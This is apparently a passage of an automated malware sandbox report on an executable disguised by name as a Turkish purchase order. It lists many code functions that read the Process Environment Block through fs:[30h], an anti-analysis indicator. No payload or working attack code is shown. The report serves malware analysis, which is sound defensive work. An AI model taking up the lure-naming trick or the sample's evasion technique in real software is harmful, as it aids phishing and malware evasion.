Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019AA250 mov eax, dword ptr fs:[00000030h] 3_2_019AA250
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019AA250 mov eax, dword ptr fs:[00000030h] 3_2_019AA250
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01978243 mov eax, dword ptr fs:[00000030h] 3_2_01978243
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01978243 mov ecx, dword ptr fs:[00000030h] 3_2_01978243
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F6259 mov eax, dword ptr fs:[00000030h] 3_2_018F6259
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018EA250 mov eax, dword ptr fs:[00000030h] 3_2_018EA250
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018E826B mov eax, dword ptr fs:[00000030h] 3_2_018E826B
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h] 3_2_019A0274
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h] 3_2_019A0274
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h] 3_2_019A0274
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h] 3_2_019A0274
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h] 3_2_019A0274
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h] 3_2_019A0274
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h] 3_2_019A0274
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h] 3_2_019A0274
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h] 3_2_019A0274
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h] 3_2_019A0274
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h] 3_2_019A0274
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h] 3_2_019A0274
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F4260 mov eax, dword ptr fs:[00000030h] 3_2_018F4260
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F4260 mov eax, dword ptr fs:[00000030h] 3_2_018F4260
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F4260 mov eax, dword ptr fs:[00000030h] 3_2_018F4260
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F2582 mov eax, dword ptr fs:[00000030h] 3_2_018F2582
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F2582 mov ecx, dword ptr fs:[00000030h] 3_2_018F2582
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192E59C mov eax, dword ptr fs:[00000030h] 3_2_0192E59C
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01924588 mov eax, dword ptr fs:[00000030h] 3_2_01924588
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019145B1 mov eax, dword ptr fs:[00000030h] 3_2_019145B1
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019145B1 mov eax, dword ptr fs:[00000030h] 3_2_019145B1
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019705A7 mov eax, dword ptr fs:[00000030h] 3_2_019705A7
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019705A7 mov eax, dword ptr fs:[00000030h] 3_2_019705A7
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019705A7 mov eax, dword ptr fs:[00000030h] 3_2_019705A7
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192A5D0 mov eax, dword ptr fs:[00000030h] 3_2_0192A5D0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192A5D0 mov eax, dword ptr fs:[00000030h] 3_2_0192A5D0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192E5CF mov eax, dword ptr fs:[00000030h] 3_2_0192E5CF
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192E5CF mov eax, dword ptr fs:[00000030h] 3_2_0192E5CF
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F65D0 mov eax, dword ptr fs:[00000030h] 3_2_018F65D0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F25E0 mov eax, dword ptr fs:[00000030h] 3_2_018F25E0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0191E5E7 mov eax, dword ptr fs:[00000030h] 3_2_0191E5E7
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0191E5E7 mov eax, dword ptr fs:[00000030h] 3_2_0191E5E7
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0191E5E7 mov eax, dword ptr fs:[00000030h] 3_2_0191E5E7
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0191E5E7 mov eax, dword ptr fs:[00000030h] 3_2_0191E5E7
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0191E5E7 mov eax, dword ptr fs:[00000030h] 3_2_0191E5E7
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0191E5E7 mov eax, dword ptr fs:[00000030h] 3_2_0191E5E7
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0191E5E7 mov eax, dword ptr fs:[00000030h] 3_2_0191E5E7
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0191E5E7 mov eax, dword ptr fs:[00000030h] 3_2_0191E5E7
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192C5ED mov eax, dword ptr fs:[00000030h] 3_2_0192C5ED
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192C5ED mov eax, dword ptr fs:[00000030h] 3_2_0192C5ED
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01986500 mov eax, dword ptr fs:[00000030h] 3_2_01986500
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019C4500 mov eax, dword ptr fs:[00000030h] 3_2_019C4500
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019C4500 mov eax, dword ptr fs:[00000030h] 3_2_019C4500
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019C4500 mov eax, dword ptr fs:[00000030h] 3_2_019C4500
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019C4500 mov eax, dword ptr fs:[00000030h] 3_2_019C4500
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019C4500 mov eax, dword ptr fs:[00000030h] 3_2_019C4500
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019C4500 mov eax, dword ptr fs:[00000030h] 3_2_019C4500
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019C4500 mov eax, dword ptr fs:[00000030h] 3_2_019C4500
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01900535 mov eax, dword ptr fs:[00000030h] 3_2_01900535
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01900535 mov eax, dword ptr fs:[00000030h] 3_2_01900535
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01900535 mov eax, dword ptr fs:[00000030h] 3_2_01900535
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01900535 mov eax, dword ptr fs:[00000030h] 3_2_01900535
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01900535 mov eax, dword ptr fs:[00000030h] 3_2_01900535
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01900535 mov eax, dword ptr fs:[00000030h] 3_2_01900535
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0191E53E mov eax, dword ptr fs:[00000030h] 3_2_0191E53E
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0191E53E mov eax, dword ptr fs:[00000030h] 3_2_0191E53E
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0191E53E mov eax, dword ptr fs:[00000030h] 3_2_0191E53E
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0191E53E mov eax, dword ptr fs:[00000030h] 3_2_0191E53E
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0191E53E mov eax, dword ptr fs:[00000030h] 3_2_0191E53E
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F8550 mov eax, dword ptr fs:[00000030h] 3_2_018F8550
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F8550 mov eax, dword ptr fs:[00000030h] 3_2_018F8550
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192656A mov eax, dword ptr fs:[00000030h] 3_2_0192656A
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192656A mov eax, dword ptr fs:[00000030h] 3_2_0192656A
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192656A mov eax, dword ptr fs:[00000030h] 3_2_0192656A
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019AA49A mov eax, dword ptr fs:[00000030h] 3_2_019AA49A
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019244B0 mov ecx, dword ptr fs:[00000030h] 3_2_019244B0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F64AB mov eax, dword ptr fs:[00000030h] 3_2_018F64AB
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0197A4B0 mov eax, dword ptr fs:[00000030h] 3_2_0197A4B0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F04E5 mov ecx, dword ptr fs:[00000030h] 3_2_018F04E5
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01928402 mov eax, dword ptr fs:[00000030h] 3_2_01928402
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01928402 mov eax, dword ptr fs:[00000030h] 3_2_01928402
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01928402 mov eax, dword ptr fs:[00000030h] 3_2_01928402
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018EC427 mov eax, dword ptr fs:[00000030h] 3_2_018EC427
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018EE420 mov eax, dword ptr fs:[00000030h] 3_2_018EE420
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018EE420 mov eax, dword ptr fs:[00000030h] 3_2_018EE420
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018EE420 mov eax, dword ptr fs:[00000030h] 3_2_018EE420
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01976420 mov eax, dword ptr fs:[00000030h] 3_2_01976420
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01976420 mov eax, dword ptr fs:[00000030h] 3_2_01976420
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01976420 mov eax, dword ptr fs:[00000030h] 3_2_01976420
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01976420 mov eax, dword ptr fs:[00000030h] 3_2_01976420
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01976420 mov eax, dword ptr fs:[00000030h] 3_2_01976420
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01976420 mov eax, dword ptr fs:[00000030h] 3_2_01976420
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01976420 mov eax, dword ptr fs:[00000030h] 3_2_01976420
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0191245A mov eax, dword ptr fs:[00000030h] 3_2_0191245A
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019AA456 mov eax, dword ptr fs:[00000030h] 3_2_019AA456
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192E443 mov eax, dword ptr fs:[00000030h] 3_2_0192E443
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192E443 mov eax, dword ptr fs:[00000030h] 3_2_0192E443
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192E443 mov eax, dword ptr fs:[00000030h] 3_2_0192E443
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192E443 mov eax, dword ptr fs:[00000030h] 3_2_0192E443
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192E443 mov eax, dword ptr fs:[00000030h] 3_2_0192E443
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192E443 mov eax, dword ptr fs:[00000030h] 3_2_0192E443
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192E443 mov eax, dword ptr fs:[00000030h] 3_2_0192E443
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192E443 mov eax, dword ptr fs:[00000030h] 3_2_0192E443
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018E645D mov eax, dword ptr fs:[00000030h] 3_2_018E645D
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0191A470 mov eax, dword ptr fs:[00000030h] 3_2_0191A470
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0191A470 mov eax, dword ptr fs:[00000030h] 3_2_0191A470
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0191A470 mov eax, dword ptr fs:[00000030h] 3_2_0191A470
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0197C460 mov ecx, dword ptr fs:[00000030h] 3_2_0197C460
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0199678E mov eax, dword ptr fs:[00000030h] 3_2_0199678E
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F07AF mov eax, dword ptr fs:[00000030h] 3_2_018F07AF
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019A47A0 mov eax, dword ptr fs:[00000030h] 3_2_019A47A0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018FC7C0 mov eax, dword ptr fs:[00000030h] 3_2_018FC7C0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019707C3 mov eax, dword ptr fs:[00000030h] 3_2_019707C3
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F47FB mov eax, dword ptr fs:[00000030h] 3_2_018F47FB
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F47FB mov eax, dword ptr fs:[00000030h] 3_2_018F47FB
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0197E7E1 mov eax, dword ptr fs:[00000030h] 3_2_0197E7E1
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019127ED mov eax, dword ptr fs:[00000030h] 3_2_019127ED
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019127ED mov eax, dword ptr fs:[00000030h] 3_2_019127ED
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019127ED mov eax, dword ptr fs:[00000030h] 3_2_019127ED
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01920710 mov eax, dword ptr fs:[00000030h] 3_2_01920710
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192C700 mov eax, dword ptr fs:[00000030h] 3_2_0192C700
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F0710 mov eax, dword ptr fs:[00000030h] 3_2_018F0710
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0196C730 mov eax, dword ptr fs:[00000030h] 3_2_0196C730
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192273C mov eax, dword ptr fs:[00000030h] 3_2_0192273C
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192273C mov ecx, dword ptr fs:[00000030h] 3_2_0192273C
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192273C mov eax, dword ptr fs:[00000030h] 3_2_0192273C
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192C720 mov eax, dword ptr fs:[00000030h] 3_2_0192C720
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192C720 mov eax, dword ptr fs:[00000030h] 3_2_0192C720
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01974755 mov eax, dword ptr fs:[00000030h] 3_2_01974755
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01932750 mov eax, dword ptr fs:[00000030h] 3_2_01932750
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01932750 mov eax, dword ptr fs:[00000030h] 3_2_01932750
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0197E75D mov eax, dword ptr fs:[00000030h] 3_2_0197E75D
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192674D mov esi, dword ptr fs:[00000030h] 3_2_0192674D
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192674D mov eax, dword ptr fs:[00000030h] 3_2_0192674D
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192674D mov eax, dword ptr fs:[00000030h] 3_2_0192674D
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F0750 mov eax, dword ptr fs:[00000030h] 3_2_018F0750
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01900770 mov eax, dword ptr fs:[00000030h] 3_2_01900770
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01900770 mov eax, dword ptr fs:[00000030h] 3_2_01900770
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01900770 mov eax, dword ptr fs:[00000030h] 3_2_01900770
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01900770 mov eax, dword ptr fs:[00000030h] 3_2_01900770
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01900770 mov eax, dword ptr fs:[00000030h] 3_2_01900770
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01900770 mov eax, dword ptr fs:[00000030h] 3_2_01900770
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01900770 mov eax, dword ptr fs:[00000030h] 3_2_01900770
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01900770 mov eax, dword ptr fs:[00000030h] 3_2_01900770
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01900770 mov eax, dword ptr fs:[00000030h] 3_2_01900770
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01900770 mov eax, dword ptr fs:[00000030h] 3_2_01900770
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01900770 mov eax, dword ptr fs:[00000030h] 3_2_01900770
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01900770 mov eax, dword ptr fs:[00000030h] 3_2_01900770
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F8770 mov eax, dword ptr fs:[00000030h] 3_2_018F8770
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F4690 mov eax, dword ptr fs:[00000030h] 3_2_018F4690
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F4690 mov eax, dword ptr fs:[00000030h] 3_2_018F4690
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019266B0 mov eax, dword ptr fs:[00000030h] 3_2_019266B0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192C6A6 mov eax, dword ptr fs:[00000030h] 3_2_0192C6A6
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192A6C7 mov ebx, dword ptr fs:[00000030h] 3_2_0192A6C7
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0192A6C7 mov eax, dword ptr fs:[00000030h] 3_2_0192A6C7
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0196E6F2 mov eax, dword ptr fs:[00000030h] 3_2_0196E6F2
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0196E6F2 mov eax, dword ptr fs:[00000030h] 3_2_0196E6F2
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0196E6F2 mov eax, dword ptr fs:[00000030h] 3_2_0196E6F2
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0196E6F2 mov eax, dword ptr fs:[00000030h] 3_2_0196E6F2
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019706F1 mov eax, dword ptr fs:[00000030h] 3_2_019706F1
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019706F1 mov eax, dword ptr fs:[00000030h] 3_2_019706F1
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01932619 mov eax, dword ptr fs:[00000030h] 3_2_01932619
